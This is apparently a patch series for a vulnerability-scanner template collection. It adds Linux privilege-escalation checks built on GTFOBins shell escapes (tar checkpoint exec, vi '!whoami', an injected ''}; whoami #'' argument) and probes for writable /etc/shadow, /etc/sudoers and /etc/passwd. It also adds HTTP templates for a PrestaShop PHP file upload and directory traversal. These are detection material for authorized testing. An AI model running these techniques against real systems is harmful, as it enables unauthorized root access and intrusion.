b/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml new file mode 100644 index 0000000000..11bf610587 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ssh-agent + +info: + name: ssh-agent - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ssh-agent/ + metadata: + verified: true + tags: code,linux,ssh-agent,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ssh-agent whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ssh-agent whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml new file mode 100644 index 0000000000..1b258a9690 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sshpass + +info: + name: sshpass - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sshpass/ + metadata: + verified: true + tags: code,linux,sshpass,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sshpass whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo sshpass whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml new file mode 100644 index 0000000000..55299d5aa8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-stdbuf + +info: + name: stdbuf - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/stdbuf/ + metadata: + verified: true + tags: code,linux,stdbuf,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + stdbuf -i0 whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo stdbuf -i0 whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml new file mode 100644 index 0000000000..718fe1b08b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-strace + +info: + name: strace - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/strace/ + metadata: + verified: true + tags: code,linux,strace,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + strace -o /dev/null whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo strace -o /dev/null whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml new file mode 100644 index 0000000000..50b0da6204 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tar + +info: + name: tar - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tar/ + metadata: + verified: true + tags: code,linux,tar,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml new file mode 100644 index 0000000000..4b81a10008 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tcsh + +info: + name: tcsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tcsh/ + metadata: + verified: true + tags: code,linux,tcsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tcsh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo tcsh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml new file mode 100644 index 0000000000..58ed4b5fc7 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-time + +info: + name: Time - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/time/ + metadata: + verified: true + tags: code,linux,time,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + time whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo time whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml new file mode 100644 index 0000000000..32a3ff94b0 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-timeout + +info: + name: Timeout - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/timeout/ + metadata: + verified: true + tags: code,linux,timeout,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + timeout 7d whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo timeout 7d whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml new file mode 100644 index 0000000000..f74b782e9f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tmate + +info: + name: tmate - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tmate/ + metadata: + verified: true + tags: code,linux,tmate,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tmate -c whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo tmate -c whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml new file mode 100644 index 0000000000..775ce61fd3 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-torify + +info: + name: Torify - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/torify/ + metadata: + verified: true + tags: code,linux,torify,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + torify whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo torify whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml new file mode 100644 index 0000000000..f1f1bd496b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-torsocks + +info: + name: Torsocks - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/torsocks/ + metadata: + verified: true + tags: code,linux,torsocks,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + torsocks whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo torsocks whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml new file mode 100644 index 0000000000..8c81840d2d --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-unshare + +info: + name: Unshare - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/unshare/ + metadata: + verified: true + tags: code,linux,unshare,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + unshare whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo unshare whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml new file mode 100644 index 0000000000..07f5af0cc1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-vi + +info: + name: Vi - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/vi/ + metadata: + verified: true + tags: code,linux,vi,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + vi -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo vi -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml new file mode 100644 index 0000000000..acc083f434 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-view.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-view + +info: + name: View - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/view/ + metadata: + verified: true + tags: code,linux,view,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + view -c ':!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo view -c ':!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml new file mode 100644 index 0000000000..f719a656ea --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-vim + +info: + name: Vim - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/vim/ + metadata: + verified: true + tags: code,linux,vim,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + vim -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo vim -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml new file mode 100644 index 0000000000..4398b539f9 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-xargs + +info: + name: Xargs - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/xargs/ + metadata: + verified: true + tags: code,linux,xargs,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + xargs -a /dev/null whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo xargs -a /dev/null whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml new file mode 100644 index 0000000000..59238e7bbb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-xdg-user-dir + +info: + name: xdg-user-dir - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/xdg-user-dir/ + metadata: + verified: true + tags: code,linux,xdg-user-dir,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + xdg-user-dir '}; whoami #' + + #SUDO + - engine: + - sh + - bash + source: | + sudo xdg-user-dir '}; whoami #' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml new file mode 100644 index 0000000000..ec4a5e0742 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-yash + +info: + name: Yash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/yash/ + metadata: + verified: true + tags: code,linux,yash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + yash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo yash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml new file mode 100644 index 0000000000..d5b428b099 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-zsh + +info: + name: Zsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/zsh/ + metadata: + verified: true + tags: code,linux,zsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + zsh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo zsh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml b/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml new file mode 100644 index 0000000000..ef35c08596 --- /dev/null +++ b/code/privilege-escalation/linux/readable-writable-etc-shadow.yaml @@ -0,0 +1,43 @@ +id: readable-writable-etc-shadow + +info: + name: /etc/shadow writable or readabel - Privilege Escalation + author: daffainfo + severity: high + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow + metadata: + verified: true + tags: code,linux,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + [ -r "/etc/shadow" ] || [ -w "/etc/shadow" ] && echo "Either readable or writable" || echo "Not readable and not writable" + + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: word + part: code_2_response + words: + - "Either readable or writable" + + - type: word + part: code_2_response + words: + - "Not readable and not writable" + negative: true \ No newline at end of file diff --git a/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml b/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml new file mode 100644 index 0000000000..6a5f3846f8 --- /dev/null +++ b/code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml @@ -0,0 +1,43 @@ +id: readable-writable-etc-sudoers + +info: + name: /etc/sudoers writable or readable - Privilege Escalation + author: daffainfo + severity: high + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d + metadata: + verified: true + tags: code,linux,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + [ -r "/etc/sudoers" ] || [ -w "/etc/sudoers" ] && echo "Either readable or writable" || echo "Not readable and not writable" + + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: word + part: code_2_response + words: + - "Either readable or writable" + + - type: word + part: code_2_response + words: + - "Not readable and not writable" + negative: true \ No newline at end of file diff --git a/code/privilege-escalation/linux/sudo-nopasswd.yaml b/code/privilege-escalation/linux/sudo-nopasswd.yaml new file mode 100644 index 0000000000..a5dd48786b --- /dev/null +++ b/code/privilege-escalation/linux/sudo-nopasswd.yaml @@ -0,0 +1,26 @@ +id: sudo-nopasswd + +info: + name: Sudo NOPASSWD - Privilege Escalation + author: daffainfo + severity: high + description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd + metadata: + verified: true + tags: code,linux,sudo,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + sudo -l + + matchers: + - type: word + part: code_1_response + words: + - "(root) NOPASSWD:" \ No newline at end of file diff --git a/code/privilege-escalation/linux/writable-etc-passwd.yaml b/code/privilege-escalation/linux/writable-etc-passwd.yaml new file mode 100644 index 0000000000..0f0d42cf42 --- /dev/null +++ b/code/privilege-escalation/linux/writable-etc-passwd.yaml @@ -0,0 +1,31 @@ +id: writable-etc-passwd + +info: + name: /etc/passwd writable - Privilege Escalation + author: daffainfo + severity: high + reference: + - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd + metadata: + verified: true + tags: code,linux,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + [ -w "/etc/passwd" ] && echo "Writable" || echo "Not writable" + + matchers: + - type: word + part: code_1_response + words: + - "Writable" + + - type: word + part: code_1_response + words: + - "Not writable" + negative: true \ No newline at end of file From 4989a2d085ce46a9dce9b3f1888143dea2c138d8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 13 Dec 2023 22:09:13 +0700 Subject: [PATCH 002/285] fix: wrong title and author for CVE-2019-14287.yaml --- code/cves/2023/CVE-2019-14287.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/code/cves/2023/CVE-2019-14287.yaml b/code/cves/2023/CVE-2019-14287.yaml index 25399daf6d..65abc89a69 100644 --- a/code/cves/2023/CVE-2019-14287.yaml +++ b/code/cves/2023/CVE-2019-14287.yaml @@ -1,8 +1,8 @@ id: CVE-2019-14287 info: - name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel - author: princechaddha + name: Sudo <= 1.8.27 - Security Bypass + author: daffainfo severity: high description: | In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. From de704ca95254702c599b456c69987e4693c54313 Mon Sep 17 00:00:00 2001 From: mastercho Date: Sun, 31 Dec 2023 18:09:36 +0200 Subject: [PATCH 003/285] A festive templates --- http/cves/2018/CVE-2018-10942.yaml | 67 +++++++++++++++++++ http/cves/2023/CVE-2023-27639.yaml | 32 +++++++++ http/cves/2023/CVE-2023-27640.yaml | 29 ++++++++ http/exposed-panels/autoset-detect.yaml | 35 ++++++++++ http/exposed-panels/compalex-detect.yaml | 39 +++++++++++ http/exposed-panels/openbullet2-panel.yaml | 4 +- http/exposures/backups/php-backup-files.yaml | 1 + http/exposures/backups/sql-dump.yaml | 3 +- http/exposures/backups/zip-backup-files.yaml | 16 ++++- http/exposures/configs/phpinfo-files.yaml | 5 +- http/exposures/configs/vbulletin-fpd.yaml | 41 ++++++++++++ .../blocktestimonial-file-upload.yaml | 65 ++++++++++++++++++ .../vbulletin/vbulletin-backdoor.yaml | 44 ++++++++++++ 13 files changed, 377 insertions(+), 4 deletions(-) create mode 100644 http/cves/2018/CVE-2018-10942.yaml create mode 100644 http/cves/2023/CVE-2023-27639.yaml create mode 100644 http/cves/2023/CVE-2023-27640.yaml create mode 100644 http/exposed-panels/autoset-detect.yaml create mode 100644 http/exposed-panels/compalex-detect.yaml create mode 100644 http/exposures/configs/vbulletin-fpd.yaml create mode 100644 http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml create mode 100644 http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml new file mode 100644 index 0000000000..b86e61ec74 --- /dev/null +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -0,0 +1,67 @@ +id: CVE-2018-10942 + +info: + name: Prestashop attributewizardpro module Arbitrary File Upload + author: MaStErChO + severity: critical + description: | + In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file. + reference: + - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en + - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ + - https://github.com/advisories/GHSA-3r9j-v4r2-2rj9 + metadata: + max-request: 2 + tags: prestashop,attributewizardpro,intrusive,file-upload +variables: + filename: '{{rand_base(7, "abc")}}' + +http: + - raw: + - | + POST /modules/{{paths}}/file_upload.php HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Accept: */* + User-Agent: python-requests/2.27.1 + Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818 + + --ba1f796d0aa2482e9c51c81ae6087818 + Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php" + Content-Type: multipart/form-data + + {{randstr}} + --ba1f796d0aa2482e9c51c81ae6087818-- + - | + GET /modules/{{paths}}/file_uploads/{{file}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + paths: + - 'attributewizardpro' + - '1attributewizardpro' + - 'attributewizardpro.OLD' + - 'attributewizardpro_x' + + stop-at-first-match: true + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '{{filename}}' + - type: word + part: body_2 + words: + - '{{randstr}}' + extractors: + - type: regex + name: file + part: body_1 + internal: true + group: 1 + regex: + - '(.*?)\|\|\|\|' \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml new file mode 100644 index 0000000000..5ab758afde --- /dev/null +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-27639 +info: + name: PrestaShop tshirtecommerce Directory Traversal + author: MaStErChO + severity: high + description: | + "The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files." + reference: + - https://www.cvedetails.com/cve/CVE-2023-27639/ + - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html + metadata: + max-request: 1 + product: tshirtecommerce + framework: prestashop + shodan-query: http.component:"prestashop" + tags: cve,cve2023,prestashop,lfi +http: + - method: POST + path: + - "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" + body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "SqlFormatter Examples" + - type: word + words: + - "?php" diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml new file mode 100644 index 0000000000..55e53be3a1 --- /dev/null +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -0,0 +1,29 @@ +id: CVE-2023-27640 +info: + name: PrestaShop tshirtecommerce Directory Traversal + author: MaStErChO + severity: high + description: | + "The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files." + reference: + - https://www.cvedetails.com/cve/CVE-2023-27640/ + - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html + metadata: + max-request: 1 + product: tshirtecommerce + framework: prestashop + shodan-query: http.component:"prestashop" + tags: cve,cve2023,prestashop,lfi +http: + - method: GET + path: + - "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(base64_decode(body), "PrestaShop") + - type: dsl + dsl: + - contains(base64_decode(body), "?php") \ No newline at end of file diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml new file mode 100644 index 0000000000..b9155675b6 --- /dev/null +++ b/http/exposed-panels/autoset-detect.yaml @@ -0,0 +1,35 @@ +id: autoset-detect + +info: + name: AutoSet Page - Detect + author: MaStErCho + severity: info + reference: + - http://autoset.net/xe/ + metadata: + max-request: 1 + tags: tech,php,autoset,apache + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "title>AutoSet" + - "http://www.autoset.net" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'AutoSet (\d+(\.\d+)+)\b' \ No newline at end of file diff --git a/http/exposed-panels/compalex-detect.yaml b/http/exposed-panels/compalex-detect.yaml new file mode 100644 index 0000000000..6fd9877f6b --- /dev/null +++ b/http/exposed-panels/compalex-detect.yaml @@ -0,0 +1,39 @@ +id: compalex-detect + +info: + name: Compalex - Detect + author: MaStErCho + severity: medium + reference: + - http://compalex.net/ + tags: tech,php,compalex,sql + +http: + - method: GET + path: + - '{{BaseURL}}/{{paths}}/' + - '{{paths}}.{{BaseURL}}/' + + payloads: + paths: + - 'db' + - 'sql' + - 'compalex' + - '_db' + - 'dbdiff' + + + stop-at-first-match: true + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "title>COMPALEX" + - "h1>Compalex" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml index 59ae4a84c5..9e29486316 100644 --- a/http/exposed-panels/openbullet2-panel.yaml +++ b/http/exposed-panels/openbullet2-panel.yaml @@ -19,9 +19,11 @@ http: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}:5000" host-redirects: true max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: @@ -33,4 +35,4 @@ http: status: - 200 -# digest: 4b0a00483046022100dd136554782498757934e378d6b3d17310b890f36927f0f207b88eea850bdae5022100e2b87ab11518d77bb41729df79da05c9c16a0606b5f23961e420dcb250fc9fed:922c64590222798bb761d5b6d8e72950 +# digest: 